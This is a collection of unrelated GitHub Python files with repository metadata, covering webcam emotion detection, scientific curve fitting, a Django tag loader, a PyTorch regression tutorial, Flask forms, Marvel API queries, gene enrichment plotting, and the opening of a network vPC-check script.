# "field_1":None,
# "field_2":"b",
# "field_3":{"z":"z","y":"y","x":None},
# "field_4":[{"z":"z","y":"y","x":None}, None, {"z":"z","y":None, "x":{"a":None,"b":"b"}}]
# }
# print(remove_nulls(data))
| rylativity/python-utils | dataprep.py | dataprep.py | py | 2,193 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "typing.Union",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number"... |
73954150588 | import cv2
import sys
from emot import emo_det
cascPath = "webcam.xml"
faceCascade = cv2.CascadeClassifier(cascPath)
font = cv2.FONT_HERSHEY_SIMPLEX
video_capture = cv2.VideoCapture(0)
while True:
# Capture frame-by-frame
ret, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
flags=cv2.CASCADE_SCALE_IMAGE
)
# Draw a rectangle around the faces and display the dominant emotion and score(in %)
for (x, y, w, h) in faces:
dom_emotion,dom_score = emo_det(frame)
cv2.putText(frame, dom_emotion+" "+str(dom_score*100)+'%', (x, y), font, 1, (0, 255, 0), 2)
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
# Display the resulting frame
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything is done, release the capture
video_capture.release()
cv2.destroyAllWindows()
| allansuresh/face-emo-detect | det.py | det.py | py | 1,087 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "cv2.CascadeClassifier",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "cv2... |
34473798674 | import numpy as np
from scipy.optimize import curve_fit
import sys
def fit_DD(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
Fit P_DD(k, mu, lambda) with an given function
f(lambda, y0, ...) = PDD_0 + f(lambda)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu (int): mu index
f: fitting function f(lambda, *params)
fit: dictornary for results
Returns:
fit (dict)
fit['lambda'] (array): lambda[ilambda]
fit['PDD_params'] (array): best fitting *params
fit['PDD'] (array): best fitting PDD[ilamba]
"""
x = d['lambda'][:ilambda_max]
y = d['summary']['PDD'][ik, imu, :ilambda_max]/d['summary']['PDD0'][ik, imu]
def ff(x, *params):
return PDD0*f(x, *params)
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount - 1)
# fitting
try:
popt, pcov = curve_fit(f, x, y, p0=p0)
except RuntimeError:
return None
if fit is None:
fit = {}
fit['PDD_amp'] = d['summary']['PDD0'][ik, imu]
fit['PDD_params'] = popt
fit['lambda'] = x
fit['PDD'] = d['summary']['PDD0'][ik, imu]*f(x, *popt)
return fit
def fit_DU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
Fit P_DU(k, mu, lambda) with an given function
f(lambda, ...) = A*lambda*f(lambda, ...)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu: (int): mu index
f: (func): fitting function f(lambda, *params)
fit (dict): dictornary for results
"""
def ff(x, A, *params):
return A*x*f(x, *params)
x = d['lambda'][:ilambda_max]
y = d['summary']['PDU'][ik, imu, :ilambda_max]
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount)
else:
p0 = [0,] + p0
p0[0] = y[10]/x[10]
# fitting
try:
popt, pcov = curve_fit(ff, x, y, p0=p0)
except RuntimeError:
sys.stderr.write('Warning: unable to fit DU with %s; ik=%d imu=%d\n' %
(f.__name__, ik, imu))
return None
if fit is None:
fit = {}
fit['PDU_amp'] = popt[0]
fit['PDU_params'] = popt[1:]
fit['lambda'] = x
fit['PDU'] = ff(x, *popt)
return fit
def fit_UU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
Fit P_UU(k, mu, lambda) with an given function
f(lambda, ...) = A*lambda**2*f(lambda, ...)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu (int): mu index
f (func): fitting function f(lambda, *params)
fit (dict): dictionary for the result
"""
def ff(x, A, *params):
return A*x**2*f(x, *params)
x = d['lambda'][:ilambda_max]
y = d['summary']['PUU'][ik, imu, :ilambda_max]
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount)
else:
p0 = [0.0,] + p0
p0[0] = y[10]/x[10]**2
assert(len(p0) == f.__code__.co_argcount)
# fitting
try:
popt, pcov = curve_fit(ff, x, y, p0=p0)
except RuntimeError:
sys.stderr.write('Warning: unable to fit UU with %s; ik=%d imu=%d\n' %
(f.__name__, ik, imu))
return None
if fit is None:
fit = {}
fit['PUU_amp'] = popt[0]
fit['PUU_params'] = popt[1:]
fit['lambda'] = x
fit['PUU'] = ff(x, *popt)
return fit
def _nans(shape):
a = np.empty(shape)
a[:] = np.nan
return a
def fit_lambda(d, ik, imu, f, *,
kind=('DD', 'DU', 'UU'),
p0=None, ilambda_max=None):
"""
Fit lambda plot with a fitting function f for a pair of k, mu
P_DD(k, mu, lambda) = P_DD(k, mu, lambda=0)*f(lambda)
P_DU(k, mu, lambda) = P_DU_amp*lambda*f(lambda)
P_UU(k, mu, lambda) = P_UU_amp*lamba**2*f(lambda)
Args:
data (dict): lambda data loaded by load_lambda
ik (array-like): index of k
imu (array-like): index of mu
f (func): fitting function f(lambda, fitting parameters ...)
kind (list): fitting P_**, subset of ('DD', 'DU', 'UU')
p0 (list): initial parameter guess
ik, imu can be:
integer, 1D array, or 2D array.
Result:
fit (dict)
fit['PDD'] (np.array): fitted P_DD
fit['PDU'] (np.array): fitted P_DU
fit['PUU'] (np.array): fitted P_DU
fit['PDD_params']: best fitting parameters in f
fit['PDU_params']: best fitting parameters in f
fit['PUU_params']: best fitting parameters in f
fit['PDU_amp']: amplitude A in PDU = A*lambda*f(lambda)
fit['PUU_amp']: amplitude A in PDU = A*lambda**2*f(lambda)
None if fitting failed
"""
# single pair of (ik, imu)
if isinstance(ik, int) and isinstance(imu, int):
fit = {}
if np.isnan(d['summary']['PDD'][ik, imu, 0]):
return None
if 'DD' in kind:
fit_DD(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
if 'DU' in kind:
fit_DU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
if 'UU' in kind:
fit_UU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
return fit
# Convert ik, imu to np.array if they are array-like
if type(ik) != np.ndarray:
ik = np.array(ik, ndmin=1)
if len(ik.shape) == 1:
if type(imu) != np.ndarray:
imu = np.array(imu, ndmin=1)
if len(imu.shape) != 1:
raise TypeError('If ik is an 1D array, '
'imu must also be an 1D array: '
'imu.shape {}'.format(imu.shape))
nk = len(ik)
nmu = len(imu)
# Convert ik and imu to 2D arrays by repeating same row/column
ik = ik.reshape((nk, 1)).repeat(nmu, axis=1)
imu = imu.reshape((1, nmu)).repeat(nk, axis=0)
# 2D arrays of ik imu
if ik.shape != imu.shape:
raise TypeError('2D arrays ik imu must have the same shape: '
'{} != {}'.format(ik.shape, imu.shape))
nk = ik.shape[0]
nmu = ik.shape[1]
nparam = f.__code__.co_argcount
# number of free paramters for f + linear RSD amplitude
nlambda = len(d['lambda'][:ilambda_max])
# Arrays for fitting results
if 'DD' in kind:
PDD_params = _nans((nk, nmu, nparam))
PDD = _nans((nk, nmu, nlambda))
if 'DU' in kind:
PDU_params = _nans((nk, nmu, nparam))
PDU = _nans((nk, nmu, nlambda))
if 'UU' in kind:
PUU_params = _nans((nk, nmu, nparam))
PUU = _nans((nk, nmu, nlambda))
for i in range(nk):
for j in range(nmu):
ik_ij = ik[i, j]
imu_ij = imu[i, j]
if 'DD' in kind:
fit = fit_DD(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PDD_params[i, j, 0] = fit['PDD_amp']
PDD_params[i, j, 1:] = fit['PDD_params']
PDD[i, j, :] = fit['PDD']
if 'DU' in kind:
fit = fit_DU(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PDU_params[i, j, 0] = fit['PDU_amp']
PDU_params[i, j, 1:] = fit['PDU_params']
PDU[i, j, :] = fit['PDU']
if 'UU' in kind:
fit = fit_UU(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PUU_params[i, j, 0] = fit['PUU_amp']
PUU_params[i, j, 1:] = fit['PUU_params']
PUU[i, j, :] = fit['PUU']
fit = {}
fit['ik'] = ik
fit['imu'] = imu
fit['lambda'] = d['lambda'][:ilambda_max]
if 'DD' in kind:
fit['PDD'] = PDD
fit['PDD_params'] = PDD_params
if 'DU' in kind:
fit['PDU'] = PDU
fit['PDU_params'] = PDU_params
if 'UU' in kind:
fit['PUU'] = PUU
fit['PUU_params'] = PUU_params
return fit
| junkoda/lambda | lib/lambdalib/lambda_fitting.py | lambda_fitting.py | py | 8,421 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.isfinite",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "scipy.optimize.curve_fit",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "numpy.isfinite",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "scipy.optimize... |
23190704074 | import csv
from django.core.management.base import BaseCommand
from recipes.models import Tag
class Command(BaseCommand):
help = 'Добавить список тэгов в базу (цвет и наименование)'
def handle(self, *args, **options):
with open('recipes/presets/tags.csv',
'r',
encoding='utf8'
) as f:
reader = csv.reader(f)
current = Tag.objects.count()
for row in reader:
color, tag, slug = row
Tag.objects.get_or_create(
color=color,
tag=tag,
slug=slug
)
result = Tag.objects.count() - current
print(f'В базу добавлено {result} тэгов')
| mechnotech/foodgram-project | recipes/management/commands/add_tags.py | add_tags.py | py | 825 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "csv.reader",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "recipes.models.Tag.objects.count",
"line_number": 17,
"usage_type": "call"
},
{
... |
6858043580 | ### Introduction to Pytorch Workflow timestamp to where it starts (link: https://www.youtube.com/watch?v=V_xro1bcAuA): 4:22:01
import torch
from torch import nn #nn contains all of pytorch's building blocks for neuro networks, pytorch documentation has a lot of building blocks for all sorts of layers
#you can combine layers in all the ways imaginable to make a beuro network model to do what you want it to do
import matplotlib.pyplot as plt
from pathlib import Path
"""
preparing and loading data (data can be almost anything in machine learning, like images, csv, videos, audio, text, or even dna)
machine learning is a game of 2 major parts: (that can be further subdivided into many other parts)
1. get data into a numerical representation (tensors)
2. build a model to learn patterns in that numerical representation
"""
# making data using a linear regression formula:
#creating known parameters: (in an actual dataset scraped from the internet, these won't be given, these are what the model is going to figure out)
weight = 0.7
bias = 0.3
#create:
start = 0
end = 1
step = 0.02
X = torch.arange(start, end, step).unsqueeze(dim=1) #x is usually used as a tensor, and we need the extra dimension for something later
y = weight * X + bias #the machine won't know this and will have to figure this out for itself, the y variable is the target
print(X[:10], y[:10], len(X), len(y))
## spliting data into training and test sets (one of the most important concepts in machine learning in general)
"""
visualizing the three datasets by comparing it to a school course:
training set: you can compare this to the course materials at a university that you would learn throughout the year, the model too would learn patterns from here
validation set: you can compare this to a practice exam, which would tune the model patterns/adjust the model's patterns (not always needed)
Test set: you can compare this to a final exam: which would see if the model is ready to be implimented/tests the model's performance on data it hasn't seen before
Goal: generalization (the ability for a machine learning model to perform well on data it hasn't seen before)
amount of data used for training set: ~60-80% (always needed)
amount of data used for validation set: 10-20% (not always needed)
amount of data used for test set: 10-20% (always needed)
"""
#create a train/test split/set (set and split mean the same thing in this case)
train_split = int(0.8 * len(X))
X_train, y_train = X[:train_split], y[:train_split] #gets all the data that's previous to that index
X_test, y_test = X[train_split:], y[train_split:] #gets all the data that is past that index
print(len(X_train), len(y_train), len(X_test), len(y_test)) #prints the amount of training features, training lables, testing features, testing lables
#NOTE: you can also use the sklearn/scikit module to split the training data in a more random way
## building a function to visualize the data
def plot_prediction(train_data = X_train,
train_lables = y_train,
test_data = X_test,
test_lables = y_test,
predictions = None):
"""
Plots training data, test data, and compares predictions
"""
plt.figure(figsize=(10, 7))
#plot training data in blue
plt.scatter(train_data, train_lables, c="blue", s=4, label="Training Data")
#plot testing data in green
plt.scatter(test_data, test_lables, c="green", s=4, label="Testing Data")
if predictions != None:
#plot the predictions if they exist
plt.scatter(test_data, predictions, c="red", s=4, label="Predictions")
plt.legend(prop={"size": 14})
plt.show()
## building a model:
class LinearRegressionModel(nn.Module): # <- almost everything in pytorch inherits from nn, for more info: https://pytorch.org/docs/stable/generated/torch.nn.Module.html
def __init__(self):
super().__init__() #start with random parameters, then update them to fit the training data, by running it through the formula it'll adjust the data to fit the linear regression formula
self.weight = nn.Parameter(torch.randn(1,
requires_grad=True, #gradient descent = true
dtype=torch.float))
self.bias = nn.Parameter(torch.randn(1,
requires_grad=True,
dtype=torch.float)) #we might also initialize a layer or a list of layers for our model to use
# Forward method to define the computation in a model:x is a parameter/input value, as you can see
def forward(self, x: torch.Tensor) -> torch.Tensor: #x is the input data (of torch.Tensor datatype), and this function is going to return a tensor datatype
return self.weight * x + self.bias #this is the linear regression formula, forward is what defines the opperation that a module does
### any subclass of nn.module needs to override the forward() method from model since it defines the computation of the model
"""
what the model does:
- Starts with random values (weights and biases)
- looks at training data and adjusts the random values to better represent/get closer to the ideal values (weight and bias values of our original formula)
How does it do it:
1. Gradient Descent
2. Back Propagation
also check out the pytorch cheatsheet by googling pytorch cheatsheet
Model building essentials:
- torch.nn: contains all of the building materials for computational graphs (a neuro networks can be considered a computational graph)
- torch.nn.Parameter(): what parameters our model should try and learn, often a pytorch layer from pytorch.nn will set these for us
- torch.nn.Module: the base class for all neuro network modules, if you subclass it, you should override forward()
- torch.optim: this references the optimizer in pytorch, they will help with gradient descent and contains various optimization algorithms
- torch.data.Dataset: represents a map between the key (label) and sample (feature) pairs of your data, such as images and their associated labels
- torch.data.DataLoader: creates a python iterable over a torch Dataset, allowing you to iterate over your data
- torchvision.transforms: for pictures and vision into data into models
- torchmetrics:
- def forward(): all nn.Module subclasses require you to override this, as previously stated, this method defines what happens in the forward computation
"""
## Checking the contents of our model:
#to check the parameters of our model, we can use .parameters():
#sets tha seed so the values won't vary and results will stay consistant, without this, the tensor values in the LinearRegressionModel would be random every time (which is what we want, but for educational purposes that's not needed here)
torch.manual_seed(42)
#initialize model
model = LinearRegressionModel()
print(list(model.parameters()))
#list named parameters: (a parameter is something that the model sets itself/is present in the "()" incase i'm dum and forgot)
print(model.state_dict()) #the name comes from the self.weight and self.bias i think
## making predictions using torch.inference_mode()
#context manager, its good to make this a habit since it turns off gradient tracking since when we're doing predictions, which makes it a lot faster in larger data sets
#there's also torch.no_grad() but inference_mode is the prefered
with torch.inference_mode():
y_preds = model(X_test)
print(f"Predictions: {y_preds}\nTest Data: {y_test}")
plot_prediction(predictions=y_preds)
"""## Training the model (moving from unknown/random parameters closer to the actual accurate parameters, aka moving from a poor representation of the data to a better one)
The loss function tells us how wrong our model's predictions are
- note that a loss function can also be refered to as a cost function or a criterion in different areas
Things we need to train:
- Loss function - a function that measures how wrong our model's predictions are compared to the idea outputs, the lower the better
- Optimizer - takes into account the loss of a model and adjusts the model's parameters (e.g. weight and bias) to improve the loss function
For pytorch specifically
, we need:
- a training loop
- a testing look
you can check out all the loss functions in the pytorch documentation: https://pytorch.org/docs/stable/nn.html#loss-functions
"""
#choosing and implimenting a loss function and a optimizer:
#using L1Loss/Mean Absolute Error (taking the absolute difference between all the expected value/ideal value and the actual value and returns its average)
#measures how wrong our data is
loss_fn = nn.L1Loss()
#setup an optimizer (using a Stoch(SGD) algorithm)
#an optimizer adjusts the parameters according to the loss function to reduce the loss
optimizer = torch.optim.SGD(model.parameters(), #the parameters that its going to take a look at/optimize
lr= 0.01) #learning rate: one of the most important hyperparameter (we set) you can set (regular parameters are set by the code)
#general idea of how optimizers work: it first increases the value in one direction, if the loss increases, then it increases in the other direction until the best value is achieved
"""
The learning rate (lr) is how mcuh it adjusts the parameters given to reduce the loss function/optimize the values, so the smaller the lr, the smaller the change in the parameter
the larget the learning rate, the larger the change int he parameter, if the lr is too bigthen it might skip over the optimal value, but if its too smal, then it'll take too
long to optimize
Q&A:
which loss function and optimizer should I use?
this depends on the context, with experience you'll get an idea of what works and what doesn't with your particular data set
ex. a regression problem would require something like a loss function of nn.L1Loss() and an optimizer like torch.optim.SGD()
but for classification problems like classifying whether or not a photo is of a dog or a cat, you'll likely want to use a loss function of nn.BCELoss() (binary cross entropy loss)
"""
## Building a training Loop (and a testing loop):
"""
steps:
0. looping through the data
1. forward pass (moving our data through the forward() method), also called forward propagation, moving in the opposite direction of a back propagation
2. calculate the loss: compare the forward pass predictions to the ground truth labels
3. optimizer zero grad
4. Back propagation (loss backwards?): data moves backwards through the network to calculate the gradients of each of the parameters of the model with respect to loss
5. optimizer step: use the optimizer to adjust the model's parameters to try to improve the loss
"""
#an epoch is one loop through the data, a hyper parameter because we set it ourselves
epochs = 200
#track different values and tracks model progress, used to plot model progress later on, useful for comparing with future experiments
epoch_count = []
loss_values = []
test_loss_values = []
print(model.state_dict())
for epoch in range(epochs):
#set the model to training mode, training mode sets all paramaters that requires gradients to require gradients, requires_grad=True
model.train()
#forward pass:
y_pred = model(X_train)
#loss function:
loss = loss_fn(y_pred, y_train) #predictions first then target
print(f"Loss: {loss}")
#optimizer zero_grad()
optimizer.zero_grad()
#4. back propagation on loss with respect to the parameters of the model
loss.backward()
#Optimizer, we want to step towards a gradient with a slope of 0 (slope of the loss function) or as low as possible, this is gradient descent and pytorch is doing this for you
#in torch autograd
optimizer.step() #by default how the optimizer changes will accumulate through the loop, so we have to zero them above (shown in step 3) for the next iteration of the loop
### testing
model.eval() #evaluation mode, turns off training, starts testing
#this turns off different stuff in the model that's not used for testing (essentially its like dropout/batch norm layers, read docs for more info)
with torch.inference_mode(): #turns off gradient tracking for inference and a couple of other stuff to make testing faster. torch.no_grad() does the same but slower
#1. foward pass:
test_pred = model(X_test)
#2. loss calculation:
test_loss = loss_fn(test_pred, y_test) #y_test is the test labels, calculates the testing loss value
if epoch % 10 == 0:
epoch_count.append(epoch)
loss_values.append(loss)
test_loss_values.append(test_loss)
print(f"Epoch: {epoch} | Loss: {loss} | Test loss: {test_loss}")
print(model.state_dict())
#matplotlib works with numpy, not working with the gpu because i don't have one so i can skip the "".cpu()"".numpy() part and just go right to .numpy
plt.plot(torch.tensor(epoch_count).numpy(), torch.tensor(loss_values).numpy(), label="Train loss")
plt.plot(torch.tensor(epoch_count).numpy(), torch.tensor(test_loss_values).numpy(), label="Test loss")
plt.title("Training and test loss curves")
plt.ylabel("Loss")
plt.xlabel("Epoch")
plt.show()
#there is also learning rate scheduling, which is basically starting with big steps in the learning rate, then slowly lowering it,like reacing for the coin at the backofthe couch
#the lowest point is the convergence, its the point where the loss function is at its minimum
#the steps in the loop can be turned into a function, do later, first build intuition for it
with torch.inference_mode():
y_preds_new = model(X_test)
plot_prediction(predictions=y_preds_new)
## Saving models:
"""
there are 3 main methods you should know about when it comes to saving and loading: (https://pytorch.org/tutorials/beginner/saving_loading_models.html)
1. torch.save(): saves a serialized object to disk, uses the python pickle library's utility for serialization. Models, tensors, and dictionaries are all kinds of objects that
can be saved using this function, its recommended to save the state_dict, but you can also save the entire model
2. torch.load(): uses the pickle module to unpickle facilities to deserialize object files to memory, in the process also facilitates the device that the data is being loaded
into
3. torch.nn.Module.load_state_dict(): Loads a model's parameter dictionary using a deserialized state_dict, for more info, check out the website linked above
"""
#create model directory:
MODEL_PATH = Path("models")
MODEL_PATH.mkdir(parents=True, exist_ok=True)
#create a model save path
MODEL_NAME = "01_pytorch_workflow_tutorial.pth" #the .pth is for saving a pytorch model
MODEL_SAVE_PATH = MODEL_PATH / MODEL_NAME
#saving only the model's state_dict(): (the model's weights and biases and etc)
print(f"saving model to: {MODEL_SAVE_PATH}")
torch.save(obj=model.state_dict(),
f=MODEL_SAVE_PATH)
## Loading a model into a new instance of the model:
new_model = LinearRegressionModel()
#loading the state dict/loading the pre-trained values to replace the random values
new_model.load_state_dict(torch.load(f=MODEL_SAVE_PATH)) #loads all the state dictionaries like the weights and biases and etc
#making predictions using the loaded model:
new_model.eval()
with torch.inference_mode():
new_model_pred = new_model(X_test)
y_preds = model(X_test) #incase the y_preds value was changed
##compare the predictions/forward() calculations of both models, they should be the same since the values would be the same
print(new_model_pred == y_preds)
##continued in Workflow_ractice.py
##more info on loading and saving models on the pytorch docs: https://pytorch.org/tutorials/beginner/saving_loading_models.html | attackGoose/AI-Notebook-and-projects | pytorch/Learning stuff/2_Learning_pytorch_workflow.py | 2_Learning_pytorch_workflow.py | py | 15,967 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.arange",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
19491319237 | from Permission import Permission
import pandas as pd
import requests
class Get_info:
urlMarvel = 'http://gateway.marvel.com/v1/public/characters/' #Marvel API's url
def __init__ (self, id):
"""Accessing Marvel API to get information about desired character using its id.
Information retrieved: 1. name, 2. total number of events, 3. total number of series
available, 4. total number of comics and 5. price of the most expensive comic that
the charatcer was featured in"""
self.id = id #id needs to be given
link = self.urlMarvel + str(self.id) #url for specific Marvel Character
response = requests.get(link, params = Permission().parameters()).json()
response_price = requests.get(link + '/comics', params = Permission().parameters()).json() #Request for price feature
#Get relevant features related to the character (name, events,series,comics & highest price)
self.name = response['data']['results'][0]['name']
self.events = response['data']['results'][0]['events']['available']
self.series = response['data']['results'][0]['series']['available']
self.comics = response['data']['results'][0]['comics']['available']
#To get the highest price per comic
all_prices_per_comic_list = []
for dicts in response_price['data']['results']:
for prices in dicts['prices']:
all_prices_per_comic_list.append(prices['price'])
#Highest price info
self.price = max(all_prices_per_comic_list, default=0)
def filtered_info(self):
"""Return dataframe with all the information related to desired character"""
entry = pd.DataFrame({
'Character Name' : [self.name],
'Character ID' : [self.id],
'Total Available Events' : [self.events],
'Total Available Series' : [self.series],
'Total Available Comics' : [self.comics],
'Price of the Most Expensive Comic' : [self.price]})
return entry | Guibas1812/create-api-marvel-characters | Get_Info.py | Get_Info.py | py | 2,168 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "Permission.Permission",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "Permission.Permission... |
25993094849 | from datetime import datetime
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField, FloatField
from wtforms.validators import DataRequired, Length, Regexp
class NewOrderForm(FlaskForm):
description = TextAreaField("Опис: ",
validators=[DataRequired(),
Length(max=1000)])
client = StringField('Клієнт',
id='client_autocomplete',
validators=[DataRequired(),
Length(max=200)])
created_at = StringField("Дата створення",
validators=[DataRequired(),
Regexp(
r'^(0[1-9]|[12][0-9]|3[01])[\.](0[1-9]|1[012])[\.]((19|20)\d\d|\d\d)$')],
default=datetime.now().strftime("%d.%m.%Y"))
serial = StringField("Серійний номер",
id='serial_autocomplete',
validators=[Length(max=200)])
price = FloatField("Ціна", validators=[DataRequired()])
staff = SelectField("Виконавець")
type = SelectField("Тип замовлення")
submit = SubmitField("Зберегти")
def __init__(self, order=None, staff_choices=None, type_choices=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if order:
self.description.data = order.description
self.client.data = order.client
self.created_at.data = order.created_at.strftime("%d.%m.%Y")
self.serial.data = order.device.serial
self.price.data = order.price
self.staff.data = order.staff.name
self.type.data = order.type.name
if staff_choices:
self.staff.choices = staff_choices
if type_choices:
self.type.choices = type_choices
class NewClientForm(FlaskForm):
name = StringField("Ім'я фізичної або юридичної особи",
validators=[DataRequired(),
Length(max=200)])
# validators = [Regexp(r'^(\+\d{1,2}\s?)?((\(?\d{3}\)?)[\s]?\d{3}[\s]?\d{4}|(\(?\d{3,4}\)?)[\s]?\d{3}[\s]?\d{3})$')]
phone = StringField("Номер телефону",
validators=[DataRequired(),
Length(max=80)])
address = StringField("Адреса",
validators=[Length(max=200)])
notes = TextAreaField("Примітки",
validators=[Length(max=1000)])
submit = SubmitField("Зберегти")
def __init__(self, client=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if client:
self.name.data = client.name
self.phone.data = client.phone
self.address.data = client.address
self.notes.data = client.notes
class NewDeviceForm(FlaskForm):
name = StringField("Назва")
serial = StringField("Серійний номер", validators=[DataRequired()])
submit = SubmitField("Зберегти")
def __init__(self, device=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if device:
self.name.data = device.name
self.serial.data = device.serial
class NewStaffForm(FlaskForm):
name = StringField("Ім'я")
submit = SubmitField("Зберегти")
class DeleteConfirmForm(FlaskForm):
delete = SubmitField("Так, видалити")
class NavigationForm(FlaskForm):
search_field = StringField("Введіть пошуковий запит")
status_field = SelectField('Статус')
type_field = SelectField('Тип')
sort_by_field = SelectField('Сортувати за', choices=[('new_first', 'Датою (нові спочатку)'),
('old_first', 'Датою (старі спочатку)'),
('client', 'Клієнтом'),
('status', 'Статусом')])
def __init__(self, status_choices=None, type_choices=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if status_choices:
self.status_field.choices = status_choices
if type_choices:
self.type_field.choices = type_choices
| 1Lorde/orders-tracker | orders_tracker/forms.py | forms.py | py | 4,563 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask_wtf.FlaskForm",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "wtforms.TextAreaField",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "wtforms.validators.DataRequired",
"line_number": 10,
"usage_type": "call"
},
{
"api_name"... |
43734236645 | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 16 13:14:57 2021
@author: Samael Olascoaga
@email: olaskuaga@gmail.com
"""
import pandas as pd
import gseapy as gp
import matplotlib.pyplot as plt
from gseapy.plot import barplot, dotplot
import numpy as np
import seaborn as sns
sns.set_style("whitegrid")
gene_list = pd.read_csv('common.csv', header=None)
glist = gene_list.squeeze().str.strip().tolist()
names = gp.get_library_name()
enr = gp.enrichr(gene_list= glist,
gene_sets=['KEGG_2019_Human'],
organism='Human', # don't forget to set organism to the one you desired! e.g. Yeast
description='KEGG common targets',
# no_plot=True,
cutoff=0.5 # test dataset, use lower value from range(0,1)
)
resultados = enr.results.head(15)
resultados['-log10(FDR)'] = -np.log10(resultados['Adjusted P-value'])
resultados['Genes'] = resultados['Genes'].str.split(';')
resultados['Genes'] = resultados['Genes'].apply(lambda x: len(x))
g = sns.scatterplot(data=resultados, x="-log10(FDR)", y="Term", hue='-log10(FDR)', palette="seismic"
, size="Genes", sizes=(30, 300), legend=True)
g.legend(loc=6, bbox_to_anchor=(1, 0.5), ncol=1)
plt.ylabel('')
plt.xlabel('-log10(FDR)')
plt.title('KEGG Common targets')
plt.savefig(r'KEGG_common' + '.svg', format='svg', dpi=600, bbox_inches = "tight" )
| Olascoaga/Senotherapy | ora.py | ora.py | py | 1,448 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "seaborn.set_style",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "gseapy.get_library_name",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gseapy.enri... |
73554593149 | import numpy as np
from functions import mean_absolute_percentage_error
import torch
data = np.load('predictions.npz')
h_label = data['labels']
h_pred = data['pred']
indices_under_1500 = h_label < 1500
indices_under_1300 = h_label < 1300
h_pred = torch.Tensor(h_pred)
h_label = torch.Tensor(h_label)
h_pred_under_1500 = h_pred[indices_under_1500]
h_label_under_1500 = h_label[indices_under_1500]
h_pred_under_1300 = h_pred[indices_under_1300]
h_label_under_1300 = h_label[indices_under_1300]
print('all data: ', h_pred.shape[0])
print('under 1500 data: ', h_pred_under_1500.shape[0])
print('under 1300 data: ', h_pred_under_1300.shape[0])
print('mape (all data): ', mean_absolute_percentage_error(h_label, h_pred))
print('mape (under 1500): ', mean_absolute_percentage_error(h_label_under_1500, h_pred_under_1500))
print('mape (under 1300): ', mean_absolute_percentage_error(h_label_under_1300, h_pred_under_1300))
print('label under 1300: ', h_label_under_1300)
print('pred under 1300: ', h_pred_under_1300)
| arseniybelkov/Determining_HOCB | auxillary_functions/analizePredictions.py | analizePredictions.py | py | 1,015 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.load",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "torch.Tensor",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.Tensor",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "functions.mean_absolute_percentag... |
40411416951 | #!/usr/bin/env python3
"""
Name: vpc_consistency.py
Description: NXAPI: display inconsistent vpc parameters
Example output when vpc is consistent:
% ./vpc_consistency.py --vault hashicorp --devices cvd_leaf_2 --interface Po11,Po12
192.168.11.103 cvd-1312-leaf all 22 global vpc params are consistent
